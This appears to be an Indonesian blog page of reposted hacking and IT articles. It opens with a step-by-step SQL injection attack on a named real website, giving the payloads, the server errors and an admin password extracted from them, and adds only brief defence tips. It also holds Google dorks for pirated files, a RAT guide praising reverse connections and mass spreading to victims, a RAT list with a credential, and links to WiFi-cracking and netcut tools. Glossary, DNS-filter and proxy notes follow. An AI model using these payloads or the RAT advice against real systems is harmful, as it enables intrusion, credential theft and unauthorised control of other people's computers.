Pages

Hingga Maret 2006, masih saja terdapat situs web di Republik Indonesia yang dibobol dengan teknik SQL Injection. Anda tahu betapa berbahaya bug yang satu ini ? Berikut akan kita sajikan step by step SQL Injection ini yang diambil dari langsung tulisan iko (iko94@yahoo.com)
Catatan : kita akan membatasi bahasan pada SQL Injection di MS-SQL Server.
Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin
Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.
Kita ambil yang termudah dulu, dengan cara input box. Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang biarkan aja): ‘ having 1=1–
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
——————–
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
‘T_ADMIN.NOMOR’ is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
——————–
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR
Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
‘ group by T_ADMIN.NOMOR having 1=1–
Akan keluar pesan error:
——————–
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
‘T_ADMIN.NIP’ is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
——————–
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP
Kemudian kita cari field ke tiga :
‘ group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1–
Akan keluar pesan error:
——————–
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
‘T_ADMIN.PASSWORD’ is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
——————–
Catat field ke tiga : T_ADMIN.PASSWORD
Lakukan langkah di atas sampai kita menemukan field terakhir.
Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
‘ group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1–
(catatan : kalimat harus 1 baris, tidak dipotong)
——————–
- NIP atau Password atau Unit Anda salah !! -
——————–
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.
Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.
Kita inject di kotak NIP (pass terserah) :
‘ union select sum(NOMOR) from T_ADMIN–
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
——————–
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
——————–
artinya kolom NOMOR berjenis numerik.
Berikutnya kita inject :
‘ union select sum(NIP) from T_ADMIN–
Akan keluar pesan error :
——————–
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
——————–
Artinya kolom NIP bertype char.
Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
‘ union select sum(nama_kolom) from T_ADMIN–
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char
Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
‘ union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > ‘a’–
artinya kita memilih minimum nama user yang lebih besar dari ‘a’
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
——————–
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value ‘bill ‘ to
a column of data type int.
/sipm/admin/dologin.asp, line 7
——————–
Anda lihat :
varchar value ‘bill ‘
‘bill’ itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.
Selanjutnya kita inject :
‘ union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = ‘bill’–
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
———————
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value ‘m@mpusk@u’ to a
column of data type int.
/sipm/admin/dologin.asp, line 7
———————
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u
Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba :(
Atau kita pakai jalan pintas saja….
Kita inject-kan :
‘ union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA =’bill’–
catatan : harus satu baris.
Duarrrrrr……….
Glhodhak………….
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!
Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).
Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119′ having 1=1–
akan keluar pesan error :
—————————
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
‘tb_news.NewsId’ is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
—————————
artinya ‘tb_news.NewsId’ itulah nama tabel dan kolom kita
yang pertama.
Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime
Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan
pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.
Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.
Perkiraan saya, nama-nama partai di situs KPU yang di-hack
oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.
******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah “Startup and run SQL Server” menggunakan low privilege user
di SQL Server Security tab.
Yah itulah mungkin yang dapat saya ceritakan…..
Hal itu adalah gambaran, betapa tidak amannya dunia internet…
Kalau mau lebih aman, copot kabel jaringan anda, copot disk
drive anda, copot harddisk anda, jual kompie anda !!!
Just kidding :) )
Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)
Special greets :
[+] www.neoteker.or.id
[+] www.bosen.net
[+] ftp_geo
[+] Schizoprenic (XNuxer Research Center) –> BEBASKAN DIA !!!
Sumber :
http://www.sekuritionline.net/plugins/p2_news/printarticle.php?p2_articleid=7
Paman Google
Sepintas di dunia internet, banyak sekali kegiatan hacking lewat google untuk mendapatkan file tersembunyi. FIle - file tersebut seharusnya dirahasiakan dan tidak boleh disebarkan. Tetapi, melalui google hacking itu semua dengan mudah kita ambil. Memang Google satu satunya search engine top sejagad raya ! Disini, saya hanya akan membantu anda dengan cara - cara dasar untuk hacking google supaya mendapatkan file apapun secara gratis. Tidak cara yang susah susah, karena berbahaya bagi kanker, janin, kelamin, kehamilan dan lainnya. Nah, file apa saja yang bisa kamu dapatkan? contohnya adalah file video, music, ebook, film, dokumen, arsip zip dan masih banyak lainnya. INgat..ingat,,,hanya trik dasar saja ya ! Kalo mau yang profesional bisa dikembangkan sendiri atau berguru padaku. Baca selanjutnya…
Berikut cara caranya :
Googling E-Book.
+(”index of”) +(”/ebooks”|”/book”) +(chm|pdf|zip|rar) +apache
Adalah Query yang menghasilkan Index ebook di server yang berbasis
Apache
allinurl: +(rar|chm|zip|pdf|tgz|lit) judul buku
Ganti “judul buku” dengan buku yang ingin dicari. Jika ingin mencari
“Wiro Sableng”, ganti “judul buku” dengan Wiro Sableng. Cara ini
digunakan jika benar-benar mengetahui judul buku yang dicari.
Googling Warez.
“parent directory ” Xvid -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
“parent directory ” applications -xxx -html -htm -php -shtml -opendivx
-md5 -md5sums
“parent directory ” Gamez -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
“parent directory ” DVDRip -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
Ganti Kata yang tebal dengan query.
Contoh, jika ingin mencari Limewire maka ganti “applications” dengan
Limewire. jika ingin mencari lagu dari Deep Purple berjudul Child In
Time, ganti “MP3? dengan Child in Time atau jika ingin mencari
lagu-lagu
Deep Purple tinggal ganti “MP3? dengan Deep Purple.
Googling MP3
?intitle:index.of? mp3
Cara lain untuk mencari MP3 di google adalah menggunakan Query ini.
Setelah MP3 kasih apa yang pengen dicari.
Contoh: Jika ingin mencari Led Zeppelin maka query-nya akan seperti ini
?intitle:index.of? mp3 led zeppelin
Googling file di megaupload
Untuk mencari File Video ketik :
avi|mpg|mpeg|wmv|rmvb site:megaupload.com
Untuk mencari File musik ketik :
mp3|ogg|wma site:megaupload.com
Untuk mencari archive dan program ketik :
zip|rar|exe site:megaupload.com
Untuk mencari ebooks ketik :
pdf|rar|zip|doc|lit site:megaupload.com
Googling file di rapidshare.de
Untuk mencari File Video ketik :
avi|mpg|mpeg|wmv|rmvb site:rapidshare.de
Untuk mencari File musik ketik :
mp3|ogg|wma site:rapidshare.de
Untuk mencari archive dan program ketik :
zip|rar|exe site:rapidshare.de
Untuk mencari ebooks ketik :
pdf|doc|lit|rar|zip site:rapidshare.de
Untuk Googling di Megaupload dan rapidshare bisa langsung meletakkan apa
yang diinginkan di bagian pertama.
Contoh: Jika ingin mencari DA VINCI CODE ebook gunakan query ini
da vinci code pdf|doc|lit|rar|zip site:rapidshare.de
(ini jika kita benar-benar tahu judul bukunya.
DAN UNTUK GOOGLE HACKING LAINNYA :
1. Ketikkan URL atau kriteria pencarian setelah titik dua.
2. Jangan ada spasi antara perintah dan istilah.
//////////////////////////////////////////////////////////
”””””””””””””””””””””””””””””
Perintah ext: [Mencari file tipe tertentu.]
exp = “ext:doc”
”””””””””””””””””””””””””””””
Perintah related: [Menampilkan website dengan tema serupa.]
exp = “related:yahoo.com”
”””””””””””””””””””””””””””””
Perintah site: [Menampilkan sub-site.]
exp = “site:yahoo.com”
”””””””””””””””””””””””””””””
Perintah allinurl: [Menampilkan semua URL.]
exp = “allinurl:yahoo”
”””””””””””””””””””””””””””””
Perintah allintitle: [Menampilkan semua istilah baris judul.]
exp = “allintitle:yahoo.com”
”””””””””””””””””””””””””””””
Perintah define: [Menjelaskan istilah.]
exp = “define:virus”
”””””””””””””””””””””””””””””
Perintah link: [Menampilkan popularitas website.]
exp = “link:namahomepage”
”””””””””””””””””””””””””””””
Perintah filetype:torrent [Menampilkan file tipe tertentu.]
exp = “batman filetype:torrent”
”””””””””””””””””””””””””””””
Perintah movie: [Menampilkan info film.]
exp = “movie:batman”
”””””””””””””””””””””””””””””
Perintah daterange: [Menampilkan website yang baru diindeks.]
exp = “daterange:(2006-01-01)(2006-02-02)”
”””””””””””””””””””””””””””””
//////////////////////////////////////////////////////////

APa itu RAT?
Oks RAT kependekan dari Remote Administrator TOol
Rat di gunakan untuk menghubungkan dan mengatur satu atau lebih komputer dengan berbagai kemampuan seperti:
# Screen/camera capture atau control
# File management (download/upload/execute/dll.)
# Shell control (CMD control)
# Computer control (power off/on/log off)
# Registry management (query/add/delete/modify)
# spesifikasi dari Produk RAT lain masing2.
Direct Connection
RAT type direct-connection adalah RAT dengan set up yang simple dimana Client(orang yang menyebarkan)mengkoneksikan dirinya ke satu atau lebih Server(komputer korban)secara langsung.
Reverse Connection
RAT yang menggunakan dan mengutilisasi Reverse Connection memiliki Beberapa Kelebihan
#Keluar masuk nya koneksi umumnya tidak terlacak. dan tidak terdeteksi atau di Block oleh Firewall,seperti Router.
#karena Remote komputer mengkoneksikan ke Remote administrator,Si pelaku tidak perlu mengetahui IP korban untuk melakukan hubungan.jadi dalam satu RAT pasti akan ada Client dan Server.2 Tools dalam satu software.
#mass-distribution,artinya kita bisa menyebarkan Server nya ke pada siapapun ,dan kita bisa mengontrol komputer – komputer yang sudah terinstal kan Server kita (remote komputer)lebih dari satu pada saat bersamaan.
#Jika Mass-distribution dilakukan,lebih mudah untuk Tracking komputer yang sudah di sadap dan terinstallkan RAT tersbut.karena ada fasilitas “calling home” oleh koneksi ke REmote administrator (komputer kita)
Most Pupolar RAT programs With Links, see below:
1. Cerberus RAT
2. Nuclear Rat 2.1.0
3. Prorat RAT
Username: mohdjase1 Password: 66618e869accfc4f96
4. CyberGate RAT
5. Seed 1.1 Rat
6. Lost Door V4.2 LIGHT
7. Apocalypse RAT
8. SubSeven RAT
9. Spy-Net RAT
10.Turkojan Gold RAT
Other Best Rat
11.Poison Ivy Rat
12.Shark RAT v3.0.0
ini ada beberapa trik dan tip 

semoga bermanfaat
Bandwidth Controller
software buat mengontrol bandwidth . . .
boleh nyoba yang satu ni !
http://www.ziddu.com/download/7589677/B ... l.rar.html
buat memonopoli bandwidth
netcut
http://www31.indowebster.com/6744db14a6bcd69cc27a63ef1d500dbc.zip
antinetcut
http://www39.indowebster.com/e4e1ca3fc2b5c95f518b175c446563fc.rar
kumpulan Wireless Hacking Tools !

http://www.ziddu.com/download/7589833/W ... 9.rar.html

untuk bisa menjebol Wifi
anda bisa menggunakan aircrack tutorial dapat anda lihat di youtube
Wifi Hacks 2009 AIO
download
http://rapidshare.com/files/275471954/WiFiAio2009.rar atao
http://hotfile.com/dl/11461458/ce09ff1/ ... 9.rar.html atao
http://www.easy-share.com/1907621083/WiFiAio2009.rar
klo mo tarik bandwidth untuk WIFI n LAN coba deh dengan software Banwidth Controller Personal Edition..
klo pake net cut harus putusin koneksi orang lain..nanti bisa ketahuan..
silahkan unduh http://download.cnet.com/Bandwidth-Controller-Personal-Edition/3000-2648_4-394154.htm
Wireless WEP Key Password Spy 1.1 full version
http://www.4shared.com/file/113457722/290d4ea4/WepKey_full.html

sumber : http://cumanpengenberbagi.blogspot.com/2010/04/wireless-hacking_17.html



Istilah dalam kamus besar adalah kata atau gabungan kata yang dengan cermat mengungkapkan makna konsep, proses, keadaan, atau sifat yang khas dalam bidang tertentu. Dalam Dunia IT ada banyak istilah dan istilah-istilah ini pun di bagi dalam beberapa kelompok, Contohnya istilah dalam Komputer, Jaringan, Program, Internet/Dunia Maya. Berhubung Ilmu dalam Dunia IT ini baru sedalam genangan air hujan di jalanan tapi mudah-mudahan dengan yang sedikit ini bisa bermamfaat bagi Blogger/Pembaca semua. Berikut adalah Istilah-Istilah nya :


1. Istilah dalam Komputer
  • Hang : Menggantung / Macet.
  • Soft copy : Salinan document dalam bentuk file.
2. Istilah dalam Jaringan Komputer
  • Connect : Menghubungkan komputer ke jaringan.
  • Disconnect : Memutuskan hubungan komputer dengan jaringan.
  • TCP/IP : Transmission Control Protokol/Internet Protocol yaitu protokol yang beroperasi dalam bagian yang berbeda.
  • Gateway : Sebuah mekanisme yang menyediakan akses ke sebuahsistem lain yang terhubung dalam sebuah network.
  • DHCP : Dinamic Host Configuration Protocol, sistem yang di gunakan oleh ISP yang secara otomatis memberikan alamat IP baru pada pengguna yang melakukkan login.
  • Dial-Up : Jenis komunikasi antarkomputer dengan menggunakan saluran telepon dan modem.
  • FTP : File Transfer Protocol, yaitu protokol standar untuk kegiatan lalu lintas file (upload maupun download) antaradua komputer yang terhubung dengan jaringan Internet.
  • POP : POst Office Protocol, yaitu protokol yang di gunakan untuk mengambil e-mail di Internet.
  • ISP : Internet service Provider, yaitu perusahaan atau badan usaha yang menyediakan layanan internet.
  • URL : Uniform Resource Locator, yaitu cara penanaman alamat file di Internet.
  • WAP : Wireless Application Protocol yaitu : protokol yang di gunakan pada handphone atau PDA untuk mengakses internet dengan format text.
  • Proxy Server : Server yang menjabatani komputer-komputer dalam suatu jaringan agar terhubung dengan internet.
  • DSL : Digital Subscriber Line, Merupakan teknologi yang mampu menyediakan bandwidth
3. Istilah dalam Dunia Maya
  • Netter : Seorang atau organisasi yang menggunakan Internet.
  • Cyberspace : Istilah lain dari dunia maya di internet.
  • Cybercrime : Kejahatan yang terjadi di Internet.
  • Cyberlaw : Hukum yang berlaku di dunia maya.
  • Download : Menyalin file atau program dari situs internet ke media penyimpanan lain seperti flashdisk.
  • Upload : Mengirim file atau program dari komputer lokal ke komputer sistem jaringan internet.
  • Update : Memperbaruhi program.
  • E-payment : pembayaran melalui media Internet.
  • Paypal : Bank di Dunia Maya.
  • Spider : Istilah yang di gunakan untuk mesin pencari di Internet.
  • Surfing : Menjelajahi Dunia Maya/Internet.
  • Spam : Pesan tidak di inginkan yang masuk ke alamat e-mail.
  • Hoax : E-mail yang berasal dari sumber yang tidak jelas dan biasa nya tidak benar.
4. Istilah dalam Pemograman.
  • Hacker : Seseorang yang ahli dalam bidang penguasaan sistem.
  • Cracker : Seseorang yang membuat program untuk menembuas sistem keamanan atau sistem komputer secara ilegal.
  • Coding : Penulisan Program
  • Debugging : Kesalahan dalam coding.
  • Compiling : Proses penerjemahan ke bahasa mesin.
  • Flow Chart : Salah satu tool untuk mereferensikan algoritma.
  • HTML : Hyper Text Markup Language yaitu bahasa pemograman untuk membuat web.

PANDUAN KONFIGURASI IP DNS
(Sistem Operasi Windows XP)
Buka menu START – Settings – Control Panel klik icon Network Connections 


Pilih (klik) icon Local Area Connection
Atau (klik) icon Wireless Network Connection, bila menggunakan koneksi WiFi
Pilih (klik) tombol Properties
Pilih (klik) menu check box Internet Protocol (TCP/IP)
Kemudian pilih (klik) tombol Properties

Klik bullet menu Use the following DNS server address
Isikan pada bagian Preffered DNS Server : 203.34.118.10
Isikan pada bagian Alternate DNS Server : 203.34.118.12

Kemudian pilih (klik) tombol OK
Lakukan uji coba, buka URL/URI konten negatif dengan browser
DNS filtering Nawala Project telah berfungsi dengan baik.
© 2008, Nawala Project
sumber : 




Langsung to the point aja ya... ^_^


Langkah-langkahnya

1] Carilah file di "C:\WINDOWS\system32\drivers\etc"

2] Temukan file yang bernama "HOSTS"

3] Buka dengan notepad file HOSTS tadi. Cara-nya klik kanan pada file HOSTS dan pilih open with, lalu pilih lagi notepad.

4] Di bawah tulisan "127.0.0.1 localhost" tambahkan 127.0.0.2 www.situsyangmaudiblokir.com , dan situs nanti-nya tidak akan bisa ter-akses
5] Ok dan save dengan jenis file awal (bukan notepad).

-Jadi-

127.0.0.1 localhost
127.0.0.2 www.situsyangterblokir.com
-->www.situsyangterblokir.com sekarang tidak bisa diakses<-- Untuk menambahkan beberapa situs lagi, hanya tinggal tambahkan ip dan alamat situs yang mau diblokir di bawah-nya. Contoh : 127.0.0.1 localhost 127.0.0.2 www.situsyangterblokir.com 127.0.0.3 www.blablabla.com 127.0.0.4 www.blablabla.com 127.0.0.5 www.blablabla.com dan seterusnya. Semoga bermanfaat dan berdampak baik untuk kita semua.


sumber : http://scientificfasting.blogspot.com/2009/03/memblokir-situs.html

Panduan menggunakan proxy untuk login clixsense.
Silahkan cari daftar proxy disini, atau silahkan cari lewat google dengan kata kunci ‘free proxy’ atau ‘fresh proxy’. Pilihlah proxy US, Canada, atau UK karena biasanya iklan-iklan yang ditargetkan pada negara-negara tersebutlah yang berlimpah. Gunakan proxy seetidaknya 2-3 hari saja, untuk menghindari kecurigaan dari pihak ClixSense.
Lalu ubahlah setingan di menu window browser anda misal anda pakai mozzila firefox untuk browsing di Tool>Options>Network>Setting, silahkan ganti proxy dan portnya sesuai daftar proxy dari situs penyedia proxy diatas sesuai negara yang anda inginkan. Untuk media browser lainya langkahnya sama cari bagian Tool.
Langkah- langkahnya silahkan sesuaikan dengan browser anda:
Internet Explorer :
1. Buka tools > internet options
2. Klik tab Connection trus klik LAN Settings
3. Pada bagian proxy server, isi centang pada “use a proxy..”
4. Pada box address masukan IP proxy, pada box port masukan portnya
5. Centang juga bagian “by pass..”
6. klik OK
Mozilla Firefox versi 2:
1. Buka tools > options
2. Bagian advance, klik tab Network
3. Bagian Connection, klik Setting di sebelah kanan
4. Kemudian pilih manual proxy configurations
5. Pada bagian HTTP proxy, masukkan IP proxy dan portnya
6. klik OK
Opera 9 :
1. Buka tools > preferences
2. Pilih tab advance
3. Pilih Network di bagian kiri, kemudian klik proxy server dibagian kanan
4. Centangi bagian HTTP kemudian masukkan IP proxy dan portnya
5. Klik OK
Tips aman memakai proxy
Banyak juga proxy server yang menerapkan sistem log (pencatatan jejak) sehingga data-data Anda dapat mereka curi dengan mudah, tapi gak perlu terlalu takut, kan diimbangi dengan banyaknya iklan clixsense yang muncul – harapanya.
  • Lakukan login HANYA ke situs ClixSense saja (seperlunya).
  • Setelah Anda selesai menggunakan proxy untuk keperluan ClixSense, password ClixSense Anda silahkan diubah.
  • Setiap proxy kayaknya memiliki kadaluarso bahakan hanya beberapa jam saja.
Selamat mencoba.
Setelah cukup lama menggunakan search engine google, iseng-iseng mencoba mencari informasi apakah ada search engine yang memberikan keuntungan setiap melakukan pencarian di-internet, ternyata ada, sebuah search engine yang menjawab pertanyaan tersebut yang bisa ditemui di website scour.com. Search engine scour.com ini memberikan bayaran bagi yang senang melakukan aktivitas search lewat search engine. Scour merupakan search engine yang terintegrasi dengan 3 search engine sekaligus yaitu Google, Yahoo, Msn, setiap melakukan pencarian, memberikan nilai vote dan memberikan komentar terhadap hasil pencarian yang ditemui menggunakan scour.com kita mendapatkan 1 point dan apabila kita mengajak teman anda untuk bergabung point juga bisa didapatkan, point ini dapat diuangkan melalui paypal. Jadi dapat diartikan scour merupakan search engine canggih yang memberikan hasil bagi yang menggunakannya. Untuk lebih jelas silahkan kunjungi website http://scour.com/invite/kenarok


sumber http://id.shvoong.com/business-management/marketing/1925210-http-scour-com/
Mau pencarian informasi yang lebih gesit? Coba Google Instant. Hasil pencarian ditampilkan lebih cepat dari kedipan mata!
Teknologi search yang diperkenalkan Google hari Rabu lalu ini kabarnya lebih gesit daripada metode auto-complete suggestion yang sudah diterapkan Google saat ini. Marissa Mayer (VP Search & User Experience, Google) bahkan berani menyebut teknologi anyar ini sebagai sebuah quantum leap dalam teknologi mesin pencari.
Dengan auto-complete suggestion, ketika pengguna akan mengetikkan, misalnya kata W-E-A-T-H-E-R, kotak pencarian akan menyarankan kata “weather' begitu pengguna mengetik W-E. Nah Google Instant akan memerlihatkan hasil pencarian selagi pengguna mengetik. Dalam demo yang dilakukan saat peluncuran Instant, hasil pencarian tentang “weather” sudah terpampang saat pengguna baru mengetikkan huruf W.
Fitur lain yang disuguhkan Google Instant adalah Scroll to Search. Ketika pengguna mengetikkan kata kunci pencarian, sebuah auto-fill suggestion muncul di sebelah kanan lengkap dengan menu drop down berisi saran (suggestion) lainnya.
Diluncurkan secara internasional, Google membenamkan Instant dalam 4 browser paling populer: Internet Explorer 8, Firefox, Chrome, dan Safari. Awal tahun depan, Google juga berencana versi mobile dari Instant. Menurut Marissa Mayer, teknologi Instant juga akan tersedia di platform Google lainnya, termasuk Google Appliance untuk enterprise tahun 2011.
Untuk menopang teknologi Instant, para pakar Google mengembangkan sebuah teknik caching canggih. Teknik caching tersebut dapat menerima dan mengelola milyaran informasi yang akan digunakan untuk mengantisipasi dan memampangkan hasil pencarian dalam sekejap.